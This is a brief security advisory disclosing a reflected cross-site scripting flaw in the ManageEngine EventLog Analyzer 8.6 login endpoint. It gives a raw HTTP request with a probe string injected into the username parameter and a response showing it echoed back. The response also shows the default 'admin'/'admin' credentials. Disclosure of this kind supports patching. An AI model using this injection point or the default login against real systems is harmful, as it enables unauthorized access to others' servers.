================================================================================================================================================================ ManageEngine EventLog Analyzer 8.6 cross-site scripting (XSS) Vulnerability ================================================================================================================================================================ #Date- 12/12/2013 # code by Asheesh kumar Mani Tripathi # Credit by Asheesh Anaconda #Vulnerbility ManageEngine EventLog Analyzer 8.6 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly sanitize user-supplied input #Impact A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities ======================================================================================================================== Request ======================================================================================================================== GET /event/j_security_check?forChecking=null&j_username=aad307">509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1 Host: 172.28.154.78:8400 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://172.28.154.78:8400/event/index3.do Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B Connection: keep-alive ======================================================================================================================== Response ======================================================================================================================== HTTP/1.1 200 OK Server: Apache-Coyote/1.1 isLoginPage: true Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 17 Dec 2013 19:36:08 GMT Content-Length: 17880 ManageEngine EventLog Analyzer 8

Sign In here

509283f38eba1c193]">
First time users use 'admin' / 'admin' to login   X 
Unlock the Real Value of your Machine Generated Logs